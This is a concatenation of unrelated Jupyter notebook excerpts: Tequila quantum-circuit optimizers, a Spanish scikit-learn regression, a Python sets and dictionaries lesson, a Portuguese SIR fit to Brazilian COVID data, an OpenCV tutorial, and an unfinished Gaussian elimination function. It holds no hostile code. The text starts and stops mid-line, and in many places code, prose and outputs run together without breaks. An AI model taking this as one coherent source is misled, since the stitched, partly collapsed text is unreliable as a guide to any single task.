= tq.paulis.Y(0)*tq.paulis.X(1)*tq.paulis.Y(2) U = tq.gates.Ry(tq.numpy.pi/2,0) +tq.gates.Ry(tq.numpy.pi/3,1)+tq.gates.Ry(tq.numpy.pi/4,2) U += tq.gates.Rz('a',0)+tq.gates.Rz('b',1) U += tq.gates.CNOT(control=0,target=1)+tq.gates.CNOT(control=1,target=2) U += tq.gates.Ry('c',1) +tq.gates.Rx('d',2) U += tq.gates.CNOT(control=0,target=1)+tq.gates.CNOT(control=1,target=2) E = tq.ExpectationValue(H=H, U=U) print('Hey, remember me?') tq.draw(U) ### the keyword stop_count, below, stops optimization if no improvement occurs after 50 epochs. 
### let's use a random initial starting point:
init={k:np.random.uniform(-2,2) for k in ['a','b','c','d']}
result = gpy_min(objective=E,maxiter=25,method='lbfgs', initial_values=init)
result.history.plot('energies')
print('best energy: ',result.energy)
print('optimal angles: ',result.angles)

In a very small number of steps, GPyOpt is able to match the performance of SGD with the QNG, and discovers the hidden truth: the optimal circuit, here, is one where all angles are zero (modulo 2 $\pi$). Feel free to play around more with other circuits in the space below!

2.2 Phoenics
Finally, we turn to Phoenics. This algorithm, originally developed within the Aspuru-Guzik group (hey, just like Tequila!), can be accessed in the usual fashion. Its performance on the two-qubit optimization circuit is shown below. Note that the number of datapoints exceeds the provided maxiter; maxiter here controls the number of parameter __batches__ suggested by Phoenics. Phoenics suggests a number of parameter sets to try out, per batch, that scales with the number of parameters (in a nonlinear fashion), so you may want to set maxiter lower if you are only playing around.

from tequila.optimizers.optimizer_phoenics import minimize as p_min

### optimizing the circuit in terms of pi makes the result of the optimization easier to interpret.
a = tq.Variable(name="a")*tq.numpy.pi
b = tq.Variable(name="b")*tq.numpy.pi
c = tq.Variable(name="c")*tq.numpy.pi
d = tq.Variable(name='d')*tq.numpy.pi

U = tq.gates.H(target=[0])
U += tq.gates.H(target=1)
U += tq.gates.Ry(target=0, angle=a)
U += tq.gates.Rz(target=1, angle=b)
U += tq.gates.Z(target=1,control=0)
U += tq.gates.Rx(target=0, angle=c)
U += tq.gates.Rx(target=1,angle=d)
U += tq.gates.Z(target=1,control=0)

H=(tq.paulis.Y(0)+tq.paulis.Qm(0))*tq.paulis.X(1)
O=tq.ExpectationValue(U=U,H=H)

init={'a':0.25,'b':0.25,'c':0.25,'d':0.25}
### geez! even fewer keywords!
### to see what you can pass down to phoenics, see the tequila documentation for that module.
result=p_min(O, maxiter=5, initial_values=init, silent=True)

print('Phoenics optimization results on 2 qubit circuit:')
result.history.plot('energies')
result.history.plot('angles')
print('best energy: ',result.energy)
print('optimal angles: ',result.angles)

Scikit-learn
The official Scikit-learn page is [here](https://scikit-learn.org/stable/index.html).

Example: Multiple Linear Regression
Now let's work through an example, following the steps needed to fit a model.

# Load the libraries that will be used
import numpy as np
import math
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
import sklearn
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error

## 1) EXTRACT THE DATA
# The data can come in different formats; in our case they are in csv format.
# Load the dataset and define the X and Y variables
datos = pd.read_csv('50_Startups.csv') # Located in the same folder as the Jupyter notebook
X = pd.DataFrame(datos.iloc[:, :-1].values) # Convert to a data frame
X.columns = datos.columns[:-1] # Set the column names
Y = datos.iloc[:, 4].values # Profit
print("type(datos): ",type(datos))
print("type(X)",type(X))
print("type(Y)",type(Y))

## 2) EXPLORATORY ANALYSIS
# An analytical description of the data.
# Se muestran los primeros 5 datos del data frame datos.head() # Los datos corresponden a la información de 50 empresas nuevas. La información que se tiene de cada una de ellas es: #R&D = Research and development: Gastos de investigación y desarrollo #Administration: Gastos administrativos #Marketing Spend: Gastos en las técnicas de comercialización de algún producto #State: Estado en el que se encuentra la empresa #Profit: Ganancia # Dimensiones del data frame datos.shape # Se cuenta el número de NaN's por columna datos.isnull().sum() # Cuenta los valores repetidos de la columna 1 (R&D Spend) datos["R&D Spend"].value_counts().head() # Cuenta los valores repetidos de la columna 4 (R&D Spend) datos["State"].value_counts() #Se muestran las variables dummies pd.get_dummies(X['State']).head() '''Se convierte la columna "State" en una columna categórica. Se elimina la columna de "California" porque se puede obtener su valor cuando las columnas "Florida" y "New York" son ambas 0 en el i-ésimo renglón.''' estados = pd.get_dummies(X['State'],drop_first=True) estados.head() #Se cambia la columna "State" por las variables dummies creadas print(X.head()) X=X.drop('State',axis=1) X=pd.concat([X,estados],axis=1) X.head() ## 3) VISUALIZACIÓN DE LOS DATOS # Para entender mejor los datos es necesario graficarlos. sns.distplot(Y)#Ganancia #R&D = Research and development: Gastos de investigación y desarrollo print(min(X['R&D Spend'])) print(max(X['R&D Spend'])) #Histograma de la columna "R&D Spend" plt.hist(X['R&D Spend'], bins=[0,25000,50000,75000,100000, 125000,150000,175000]) #División cada 25 mil plt.title('Histograma de la columna "R&D Spend"') plt.xlabel('Unidades monetarias') plt.ylabel('Número de empresas') plt.show() #Administration: Gastos administrativos print(min(X['Administration'])) print(max(X['Administration'])) #Histograma de la columna "Administration" plt.hist(X['Administration'], bins=[50000,75000,100000,125000, 150000,175000,200000]) #División cada 25 mil plt.title('Histograma de la columna "Administration"') plt.xlabel('Unidades monetarias') plt.ylabel('Número de empresas') plt.show() #Marketing Spend: Gastos en las técnicas de comercialización de algún producto print(min(X['Marketing Spend'])) print(max(X['Marketing Spend'])) #Histograma de la columna "Marketing Spend" plt.hist(X['Marketing Spend'], bins=[0,50000,100000,150000,200000,250000, 300000,350000,400000,450000,500000]) #División cada 50 mil plt.title('Histograma de la columna "Marketing Spend"') plt.xlabel('Unidades monetarias') plt.ylabel('Número de empresas') plt.show() #State: Estado en el que se encuentra la empresa #Histograma de la columna "State" plt.hist(datos['State']) plt.title('Histograma de la columna "State"') plt.xlabel('Estado') plt.ylabel('Número de empresas') #17 17 16 plt.show() sns.boxplot(x="R&D Spend", data=datos) round(np.mean(X['R&D Spend']),2) #Promedio de gastos por investigación y desarrollo sns.boxplot(x="Administration", data=datos) round(np.mean(X['Administration']),2) #Promedio de gastos por administración sns.boxplot(x="Marketing Spend", data=datos) round(np.mean(X['Marketing Spend']),2) #Promedio de gastos por "marketing" sns.boxplot(x=Y, data=datos) round(np.mean(Y),2) #Promedio de ganancias min(Y) #Outlier #Se muestra la correlación entre las variables sns.pairplot(datos) ## 4) DIVIDIR LOS DATOS # Se separan los datos en 2 grupos (usualmente 80% y 20%): # i) Para entrenar al modelo (80%) # ii) Para probar el modelo (20%) X_train, X_test, Y_train, Y_test = train_test_split(X, Y, #Se indican 
los vectores que se van a dividir test_size = 0.2, #Se indica el porcentajede los datos para probar el modelo random_state = 0) #Se fija la semilla # Nota: Tomar la muestra aleatoria es muy importante porque en caso de que los datos estén #ordenados el algoritmo no aprende adecuadamente. Por ejemplo si tenemos 80 sanos y 20 enfermos, #sólo se tomarían los 80 sanos (por ser los primeros 80). ## 5) CONSTRUIR UN MODELO # En este ejemplo vamos a elegir un modelo de regresión lineal simple para "X_train" regresor = LinearRegression() regresor.fit(X_train, Y_train) ## 6) PREDICCIONES # Se hacen las predicciones con "X_test" Y_pred = regresor.predict(X_test) # Se grafican los resultados de la predicción. plt.scatter(Y_test, Y_pred, color = 'black') plt.title('Predicciones') plt.xlabel('Ganancia real') plt.ylabel('Ganancia estimada') plt.show() #Nota: No estamos graficando contra ninguna variable explicativa (R&D, Administration, Marketing Spend, State). #Los valores de las predicciones se graficaron contra la ganancia real.7) EVALUACIÓN DEL MODELOVeamos cómo se comporta el modelo:7.1 Calcular $R^{2}$ ajustada $ = 1 - \dfrac{(1 - R^{2}) (n-1)}{n - p - 1}$, donde$R^{2}:$ R cuadrada de los datos$n:$ Número de datos para entrenar al modelo$p:$ Número de variables independientes7.2 Calcular los errores absolutos $(real - estimado)$ y graficarlos7.3 Calcular los errores relativos $\left( \dfrac{\text{real - estimado}}{\text{real}} \right)$ y graficarlos7.4 Graficar valores estimados vs valores reales7.5 Calcular el error cuadrático: $(real − estimado)^{2}$7.6 Calcular el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$#7.1 Calcular R^2 ajustada r_cuadrada = r2_score(Y_test,Y_pred) print('R^2 = ',round(r_cuadrada,3)) #Porcentaje de los datos explicados por el modelo #R^2 ajustada n = len(Y_train) p = X_train.shape[1] r_cuad_aj = 1 - (((1-r_cuadrada)*(n-1))/(n-p-1)) print('n = ',n) print('p = ',p) print('R^2_aj = ',round(r_cuad_aj,3)) #R^2 ajustada se utiliza para comparar modelos que tengan diferente número de predictores. #R^2 siempre aumenta cuando se agrega un predictor al modelo, aún cuando no haya una mejora real en el modelo. #7.2 Calcular los errores absolutos (real - estimado) y graficarlos err_abs = Y_test-Y_pred print(np.around(err_abs,2)) plt.scatter(Y_test, err_abs, color = 'blue') plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0 plt.title('Errores absolutos (real - estimado)') plt.xlabel('Ganancia real') plt.ylabel('Errores absolutos') plt.show() #7.3 Calcular los errores relativos [(real - estimado)/real] y graficarlos err_rel = err_abs/Y_test print(np.around(err_rel,3)) plt.scatter(Y_test, err_rel, color = 'blue') plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0 plt.title('Errores relativos [(real - estimado)/real]') plt.xlabel('Ganancia real') plt.ylabel('Errores relativos') plt.show() #7.4 Graficar valores estimados vs valores reales X = range(1,len(Y_test)+1) plt.plot(X, sorted(Y_test), color = 'black') #Recta de valores reales plt.plot(X, sorted(Y_pred), color = 'red') #Recta de valores estimados plt.title('Valores estimados vs valores reales') plt.xlabel('Índices') plt.ylabel('Ganancia') plt.show() #Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor. 
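# (Added cross-check, not in the original notebook) the error quantities computed in 7.5 and 7.6 below
# can also be obtained in one step with numpy, using only arrays already defined above:
err_cuad_np = (Y_test - Y_pred)**2   # squared errors, the same quantity as in 7.5
ecm_np = err_cuad_np.mean()          # mean squared error, the same quantity mean_squared_error returns in 7.6
print(round(ecm_np, 2))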
#7.5 Calcular el error cuadrático = (real − estimado)^2 #print(np.around(err_abs,2)) err_cuad = pow(err_abs,2) print(err_cuad) #7.6 Calcular el error cuadrático medio = (1/n) * \sum (real − estimado)^2 ''' Indica qué tan cerca está la línea de la regresión lineal de los valores estimados. i) Se elevan al cuadrado los errores absolutos. ii) Se suman. iii) Se divide el resultado entre el número de datos estimados. ''' err_cuad_medio = mean_squared_error(Y_test, Y_pred) print(round(err_cuad_medio,2)) print(round(math.sqrt(err_cuad_medio),2))#Raíz cuadrada del error cuadrático medio #Graficamos los errores cuadráticos Y= np.repeat(err_cuad_medio, len(err_cuad)) plt.scatter(Y_test, err_cuad, color = 'blue') plt.plot(Y_test,Y , color = 'lime') #Recta en Y = err_cuad_medio plt.title('Errores cuadráticos: (real − estimado)^2') plt.xlabel('Ganancia real') plt.ylabel('Errores cuadráticos') plt.show()Lesson 6: Sets and Dictionaries**Teaching**: 15min**Exercises**: 5min Use a set to store unique values* Create with `{...}`* But must use `set()` to create an empty setprimes = {2, 3, 5, 7} print('is 3 prime?', 3 in primes) print('is 9 prime?', 9 in primes)is 3 prime? True is 9 prime? False* Intersection, union, etc.odds = {3, 5, 7, 9} print('intersection', odds & primes) print('union', odds | primes)intersection {3, 5, 7} union {2, 3, 5, 7, 9}Sets are mutable* But only store *unique* valuesprimes.add(11) print('primes becomes', primes) primes.discard(7) print('after removal', primes) primes.add(11) print('after adding 11 again', primes)primes becomes {2, 3, 5, 7, 11} after removal {2, 3, 5, 11} after adding 11 again {2, 3, 5, 11}Sets are unordered* Values are stored by *hashing*, which is intentionally as random as possiblenames = {'Hopper', 'Cori', 'Kohn'} for n in names: print(n)Cori Kohn HopperUse a dictionary to store key/value pairsEquivalently, store extra information with elements of a set.birthdays = {'Hopper': 1906, 'Cori': 1896} print(birthdays['Hopper']) birthdays['Kohn'] = 1823 # oops birthdays['Kohn'] = 1923 # that's better print(birthdays)1906 {'Hopper': 1906, 'Cori': 1896, 'Kohn': 1923}* Just an accident that keys are in order of when entered.* Like sets, dictionaries store keys by hashing, which is as random as possible Set values and dictionary keys must be immutable* Changing them after insertion would leave data in the wrong place* Use a `tuple` for multi-valued keyspeople = {('Grace', 'Hopper'): 1906, ('Gerty', 'Cory'): 1896, ('Walter', 'Kohn'): 1923}You can *destructure* a tuple in the heading of a for loop:for (first, last) in people: print(first,'was born in', people[(first, last)])Grace was born in 1906 Gerty was born in 1896 Walter was born in 1923Example: create a histogramnumbers = [1, 0, 1, 2, 0, 0, 1, 2, 1, 3, 1, 0, 2] count = {} for n in numbers: if n not in count: count[n] = 1 else: count[n] = count[n] + 1 print(count){1: 5, 0: 4, 2: 3, 3: 1}Reminder: there are lots of useful Python libraries, especially the "standard library" that comes with Python:from collections import Counter print(Counter(numbers)) print(dict(Counter(numbers)))Counter({1: 5, 0: 4, 2: 3, 3: 1}) {1: 5, 0: 4, 2: 3, 3: 1}Keys are often stringsatomic_numbers = {'H' : 1, 'He' : 2, 'Li' : 3, 'Be' : 4, 'B' : 5} print('atomic number of lithium:', atomic_numbers['Li']) from mp_workshop.data import atomic_numbers for element in ('H', 'C', 'O'): print('atomic number of', element, 'is', atomic_numbers[element])atomic number of H is 1 atomic number of C is 6 atomic number of O is 8You can iterate over the keys of 
a dictionary:# Use a counter so we don't print out so much. n = 0 for element in atomic_numbers: if n < 5: print(element) n = n + 1H He Li Be BYou can also iterate over (key, value) tuples of a dictionary using the `items` method:n = 0 for (element, atomic_number) in atomic_numbers.items(): if n < 5: print(element, atomic_number) n = n + 1H 1 He 2 Li 3 Be 4 B 5Exercise: How heavy is this molecule?You are given two things:1. a dictionary mapping atomic symbols to atomic weights (`mp_workshop.data.atomic_weights`), and2. a list of (atomic_symbol, count) pairs for a molecule.```python Example molecules:methane = [('C', 1), ('H', 4)]aminothiazole = [('C', 3), ('H', 4), ('N', 2), ('S', 1)]```Print that molecule's molecular weight.from mp_workshop.data import atomic_weights # atomic weight is 16.0423 methane = [('C', 1), ('H', 4)] # atomic weight is 100.1421 aminothiazole = [('C', 3), ('H', 4), ('N', 2), ('S', 1)] # 2. Pick a molecule to test molecule = methane # 3. Do stuff to calculate `mol_weight` # ... #print(mol_weight)Os dadosLendo e visualizandos os dados do Brasil do COVID fornecidos por- [](https://github.com/wcota/covid19br)Os dados são atualizados diariamente... Então normalmente a cada dia esse pipeline pode mudar seus resultados.import pandas as pd # Lendo os dados online - wcota data_path = 'https://raw.githubusercontent.com/wcota/covid19br/master/cases-brazil-states.csv' online_data = pd.read_csv(data_path, delimiter=",") online_data.head()Filtrando e limpando os dadosselected_state = "TOTAL" at_state = online_data['state']==selected_state local_data = online_data[at_state] local_data = local_data[local_data.recovered.notnull()] #local_data = local_data.fillna(method="backfill") local_data.head() import numpy as np from datetime import datetime first_date = local_data["date"].iloc[0] first_date = datetime.fromisoformat(first_date) if selected_state == "SP": # N = 11869660 N = 44.01e6 elif selected_state == "TOTAL": N = 220e6 I = list() # <- I(t) R = local_data["recovered"].iloc[1:].to_numpy() # <- R(t) M = local_data["newDeaths"].iloc[1:].to_numpy() # <- M(t) nR = np.diff(local_data["recovered"].to_numpy()) # <- dR(t)/dt nC = local_data["newCases"].iloc[1:].to_numpy() # <- nC(t)/dt I = [ local_data["totalCases"].iloc[1] ] # I(0) # I(t) <- I(t-1) + newCases(t) - newMortes(t) - newRecovered(t) for t in range(len(M)-1): I.append(I[-1] + nC[t] - M[t] - nR[t]) I = np.array(I)Visualizando a evoluçãofrom bokeh.models import Legend, ColumnDataSource, RangeTool, LinearAxis, Range1d, HoverTool from bokeh.palettes import brewer, Inferno256 from bokeh.plotting import figure, show from bokeh.layouts import column from bokeh.io import output_notebook output_notebook() from datetime import timedelta # Criando o vetor de tempo date_vec = [ first_date + timedelta(days=k) for k in range(len(M))] # Criando os valores para legenda no plot year = [str(int(d.year)) for d in date_vec ] month = [("0"+str(int(d.month)))[-2:] for d in date_vec ] day = [("0"+str(int(d.day)))[-2:] for d in date_vec ] # Criando a fonte de dados source = ColumnDataSource(data={ 'Data' : date_vec, 'd': day, 'm': month, 'y': year, 'Infectados' : I, 'Removidos' : R, 'Mortes' : M, }) # Criando a figura p = figure(plot_height=500, plot_width=600, x_axis_type="datetime", tools="", toolbar_location=None, # y_axis_type="log", title="Evolução do COVID - São Paulo") # Preparando o estilo p.grid.grid_line_alpha = 0 p.ygrid.band_fill_color = "olive" p.ygrid.band_fill_alpha = 0.1 p.yaxis.axis_label = "Indivíduos" p.xaxis.axis_label = 
"Dias" # Incluindo as curvas i_p = p.line(x='Data', y='Infectados', legend_label="Infectados", line_cap="round", line_width=3, color="#ffd885", source=source) m_p = p.line(x='Data', y='Mortes', legend_label="Mortes", line_cap="round", line_width=3, color="#de425b", source=source) r_p = p.line(x='Data', y='Removidos', legend_label="Removidos", line_cap="round", line_width=3, color="#99d594", source=source) # Colocando as legendas p.legend.click_policy="hide" p.legend.location = "top_left" # Incluindo a ferramenta de hover p.add_tools(HoverTool( tooltips=[ ( 'Indivíduos', '$y{i}'), ( 'Data', '@d/@m/@y' ), ], renderers=[ r_p, i_p, m_p ] )) show(p)O problemaO conjunto de equações diferenciais que caracteriza o modelo é descrito abaixo. No modelo $\beta - \text{representa a taxa de transmissão ou taxa efetiva de contato} $ e $r - \text{a taxa de remoção ou recuperação.}$ $$ \begin{split} \frac{dS(t)}{dt} & = -\beta S(t) I(t) \\ \frac{dI(t)}{dt} & = \beta S(t) I(t) - rI(t) \\ \frac{dR(t)}{dt} & = r I(t) \end{split}$$ Gostaríamos de identificar quais parâmetros $\beta$ e $r$ resultam num melhor ajuste do modelo para os dados de **S**,**I** e **R**# Importando o modelo SIR from models import * sir_model = ss.SIR(pop=N, focus=["I", "R"])Estimando os parâmetrosPara estimarmos os parâmetros do modelo $\mathbf{\beta}$ e $\mathbf{r}$, vamos utilizar inicialmente o método de mínimos quadrados. Podemos então formular o problema a partir da Equação abaixo. Na Equação $y_m(k)$ representa o dado real em cada amostra $k$; $y_s(\theta,k)$ representa o **valor estimado** a partir da simulação do modelo para uma determinada amostra $k$ e $\theta$ representa o vetor ed parâmetros $\theta = [ \beta \; \; r]^T$. $$ min_{\theta}= \sum_{k=1}^{K}(y_m(k) - y_s(\theta,k))^2 $$A equação formula a pergunta: quais os valores de $beta$ e $r$ que minizam o erro quadrático quando comparados com os dados reais.import numpy as np S = N - I - R time = np.linspace(0, len(I), len(I)) # Estimando os parâmetros sir_model.fit(S, I, R, time, sample_ponder=True, resample=True, beta_sens=[1000,10], r_sens=[1000,10]) r_included = True sir_model.parameters[0]/sir_model.parameters[1] # Ro <- \beta * (1 / \r) # Criando a figura p1 = figure(plot_height=500, plot_width=600, x_axis_type="datetime", tools="", toolbar_location=None, # y_axis_type="log", title="Evolução do COVID - São Paulo") # Preparando o estilo p1.grid.grid_line_alpha = 0 p1.ygrid.band_fill_color = "olive" p1.ygrid.band_fill_alpha = 0.1 p1.yaxis.axis_label = "Indivíduos" p1.xaxis.axis_label = "Dias" # Incluindo as curvas p1.line(time, I, legend_label="Infectados", line_cap="round", line_width=3, color="#ffd885") #p1.line(time, , legend_label="Mortes", line_cap="round", line_width=3, color="#de425b") p1.line(time, R, legend_label="Removidos", line_cap="round", line_width=3, color="#99d594") p1.scatter(sir_model.pipeline["resample"]["after"]["t"], sir_model.pipeline["resample"]["after"]["I"], marker="circle",line_color="#6666ee", fill_color="#ee6666", fill_alpha=0.5, size=3) p1.scatter(sir_model.pipeline["resample"]["after"]["t"], sir_model.pipeline["resample"]["after"]["R"], marker="circle",line_color="#6666ee", fill_color="#ee6666", fill_alpha=0.5, size=3) # Colocando as legendas p1.legend.click_policy="hide" p1.legend.location = "top_left" show(p1) if r_included: initial = [S[0], I[0], R[0]] else: initial = [S[0], I[0]] results = sir_model.predict(initial, time) # Incluindo os dados de infectados im_p = p.line( date_vec, results[1], legend_label="Infectados - Modelo", 
line_width=4, line_dash="dashed", line_cap="round", color="#f57f17" ) # Incluindo os dados de recuperados if r_included: rm_p = p.line( date_vec, results[2], legend_label="Removidos - Modelo", line_dash="dashed", line_width=4, line_cap="round", color="#1b5e20" ) show(p)Predições utilizando o modelo# Criando os valores de tempo para previsão - 120 dias t_sim = np.linspace(0, len(I) + 120, len(I) + 120) date_vec_sim = [first_date + timedelta(days=k) for k in t_sim] # Prevendo para os valores selecionados prediction = sir_model.predict(initial, t_sim) # Criando o gráfico com as predições # Criando os valores para legenda no plot year_sim = [str(int(d.year)) for d in date_vec_sim ] month_sim = [("0"+str(int(d.month)))[-2:] for d in date_vec_sim ] day_sim = [("0"+str(int(d.day)))[-2:] for d in date_vec_sim ] if r_included: accum_Infect = [0] for i in N - prediction[1] - prediction[2]: accum_Infect.append(accum_Infect[-1]+i) accum_Infect = sir_model.parameters[1] * np.array(accum_Infect) # Criando a fonte de dados if r_included: source = ColumnDataSource(data={ 'Data' : date_vec, 'd': day, 'm': month, 'y': year, 'Infectados' : I, 'Removidos' : R, 'Mortes' : M, 'InfecModelo' : prediction[1], 'RemovModelo' : prediction[2], 'AccumInfect' : accum_Infect, 'SucetModelo' : N - prediction[1] - prediction[2], 'DataModelo' : date_vec_sim, 'ds': day_sim, 'ms': month_sim, 'ys': year_sim }) else: source = ColumnDataSource(data={ 'Data' : date_vec, 'd': day, 'm': month, 'y': year, 'Infectados' : I, 'Removidos' : R, 'Mortes' : M, 'InfecModelo' : prediction[1], 'DataModelo' : date_vec_sim, 'ds': day_sim, 'ms': month_sim, 'ys': year_sim }) # Criando a figura p = figure(plot_height=700, plot_width=800, x_axis_type="datetime", tools="", toolbar_location=None, y_axis_type="log", title="Previsão do COVID - Brasil") # Preparando o estilo p.grid.grid_line_alpha = 0 p.ygrid.band_fill_color = "olive" p.ygrid.band_fill_alpha = 0.1 p.yaxis.axis_label = "Indivíduos" p.xaxis.axis_label = "Dias" # Incluindo as curvas i_p = p.line(x='Data', y='Infectados', legend_label="Infectados", line_cap="round", line_width=3, color="#ffd885", source=source) m_p = p.line(x='Data', y='Mortes', legend_label="Mortes", line_cap="round", line_width=3, color="#de425b", source=source) r_p = p.line(x='Data', y='Removidos', legend_label="Removidos", line_cap="round", line_width=3, color="#99d594", source=source) mp_p = p.line(x='DataModelo', y='InfecModelo', legend_label="Infectados - Modelo", line_dash="dashed", line_cap="round", line_width=4, color="#f57f17", source=source) renders = [i_p, m_p, r_p, mp_p] if r_included: rp_p = p.line(x='DataModelo', y='RemovModelo', legend_label="Removidos - Modelo", line_dash="dashed", line_cap="round", line_width=4, color="#1b5e20", source=source) renders.append(rp_p) # Colocando as legendas p.legend.click_policy="hide" p.legend.location = "top_left" # Incluindo a ferramenta de hover p.add_tools(HoverTool( tooltips=[ ( 'Indivíduos', '$y{0.00 a}' ), ( 'Data', '@ds/@ms/@ys'), ], renderers=renders )) show(p)BokehUserWarning: ColumnDataSource's columns must be of the same length. 
Current lengths: ('AccumInfect', 186), ('Data', 65), ('DataModelo', 185), ('InfecModelo', 185), ('Infectados', 65), ('Mortes', 65), ('RemovModelo', 185), ('Removidos', 65), ('SucetModelo', 185), ('d', 65), ('ds', 185), ('m', 65), ('ms', 185), ('y', 65), ('ys', 185)Computer Vision - Tutorial 3 In this practical session, we will use the `opencv` library to perform thresholding, filtering, mathematical morphology and image segmentation.%matplotlib inline import cv2 import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm from ipywidgets import interact plt.rcParams['figure.figsize'] = [12, 8] from matplotlib.colors import LinearSegmentedColormap def getRandomColorMap(num_colors, bg_color=1): colors = np.random.rand(num_colors, 3) * 0.75 colors[0, :] = bg_color colors = tuple(map(tuple, colors)) labelColorMap = LinearSegmentedColormap.from_list('labelColorMap', colors, N=num_colors) return labelColorMap def multiplot(lines, rows, images, cmap, title, vmin=None, vmax=None): plt.figure(figsize=(20,10)) for i in np.arange(lines*rows): plt.subplot(lines, rows, i+1) plt.imshow(images[i], cmap=cmap[i], vmax=vmax) plt.title(title[i]) plt.xticks([]) plt.yticks([]) plt.show()1. Thresholding Compute and display the histogram of a grayscale image Basic thresholding with python Thresholding with OpenCVDetermine the v1 and v2 values for the following threshold types: cv.THRESH_BINARY$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$cv.THRESH_BINARY_INV$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$cv.THRESH_TRUNC$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$cv.THRESH_TO_ZERO$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$cv.THRESH_TO_ZERO_INV$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$ Otsu's thresholdingIn the previous examples, we had to chose the threshold value. We can use Otsu's algorithm to determine it. Otsu's algorithm by partsYou can fine-tune the result by applying this algorithm on the different parts of the image. 2. Filtering Gaussian noise Uniform, Gaussian and bilateral filtering Salt and pepper noise Median filtering 3. Mathematical morphology Non uniform lightningdef non_uniform_lightning_like(img, weight): width = img.shape[1] height = img.shape[0] steps_y = np.arange( start=0.0, stop=1.0, step=1.0/height) light_gradient_y = np.cos( ( 2.0 * ( steps_y * steps_y - steps_y) + 1.0)* np.pi)[:,np.newaxis] steps_x = np.arange( start=0.0, stop=1.0, step=1.0/width) light_gradient_x = np.cos( steps_x * np.pi)[np.newaxis,:] return ( weight * light_gradient_y * light_gradient_x) nul = non_uniform_lightning_like(rice, 50) rice_nul = np.clip(rice + nul, 0, 255).astype(np.uint8) multiplot(1, 3, (rice, nul, rice_nul), (cm.gray, cm.gray, cm.gray), ('Original Image', 'Non Uniform Lightning', 'Image + Non Uniform Lightning'))Erosion and dilation Local adaptation 4. 
Segmentation Thresholding and connected components labelling PreprocessingClosing -> Gaussian filtering -> Thresholding -> Connected components labelling Blob featuredef draw_blob_bounding_boxes(img, conn_comp): num_labels = conn_comp[0] stats = conn_comp[2] img_bb = cv2.cvtColor( img, cv2.COLOR_GRAY2RGB) for label in range( 1, num_labels): topleft = tuple( stats[label,:2]) bottomright = tuple( stats[label,:2] + stats[label, 2:4]) cv2.rectangle( img_bb, topleft, bottomright, (255,0,0), 3) return img_bb def draw_blob_centroids(img, conn_comp): num_labels = conn_comp[0] centroids = conn_comp[3] img_ctr = cv2.cvtColor( img, cv2.COLOR_GRAY2RGB) for label in range( 1, num_labels): centroid = tuple( centroids[label,:].astype(int)) cv2.circle( img_ctr, centroid, 3, (255,0,0), thickness=3) return img_ctrSolving linear equations with Gaussian elimination# import the numpy package in the np namespace import numpy as np # this line will load the plotting function into the namespace plt. import matplotlib.pyplot as plt # the following lines prevent Python from opening new windows for figures. %matplotlib inlinePart 1: Implement Gaussian elimination In this part you are asked to implement Gaussian elimination as presented in the lectures. It is recommended to implement separate functions for generating the reduced row echelon form, and for solving it. Below I have used the method of gaussian elimination discussed in lectures to solve systems of linear equations. These could be of the form: $$Ax = B$$Where $A$ is a square matrix of coefficients, $B$ is a column matrix of constants and $x$ is a column matrix of unknown variables to be solved.To do this I have:- Made a function called "reduced_row_echelon" which calculates the reduced row echelon form as an augmented matrix $A|B$. - I have then made a function called "solve_echelon" which uses an augmented matrix in reduced row echelon form to solve and produce a column matrix of the unknown variables $x$ to be found.- Finally i have made a function called "gaussian_elimination" which uses both of the functions above to implement the whole guassian elimination process, allowing users to easily input $A$ and $B$ instantly outputting $x$.def reduced_row_echelon( A, B ): """ Calculates the reduced row echelon form using two matrices 'A' and 'B'. The augmented matrix (A|B) in reduced row echelon form is returned. Arguments: 'A': Matrix ceofficient. 'B': Column matrix of constants. Caveats: 'A' must be of square form. 'B' must have the same number of rows as 'A'. """ #Ensure 'A' is square. rows_a, columns_a = np.shape( A ) assert rows_a == columns_a, 'A is not a square matrix.' #Ensure 'B' has 1 column, and same number of rows as 'A'. rows_b, columns_b = np.shape( B ) assert rows_b == rows_a, 'B does not have the same number of rows as A.' #Form the augmented matrix. augmented_matrix = np.c_[A, B] pivot_row = 0 #Assign the pivot to the next diagonal location, until end of matrix is reached. while pivot_row < rows_a: pivot = augmented_matrix[pivot_row, pivot_row] #Iterate down the pivot column, by accessing the rows. for row in range( pivot_row, rows_a ): if row == pivot_row: #If diagonal location, make this value 1. augmented_matrix[row] /= pivot normalised_row = augmented_matrix[row] #Otheriwse zero the rest of the elements below. else: element_to_zero = augmented_matrix[row, pivot_row] #Exploit that the normalised row will always have 1 in this column. 
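#(Added comment) normalised_row[pivot_row] is 1 by construction, so subtracting
#element_to_zero*normalised_row sets augmented_matrix[row, pivot_row] to zero while
#updating the rest of that row consistently.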
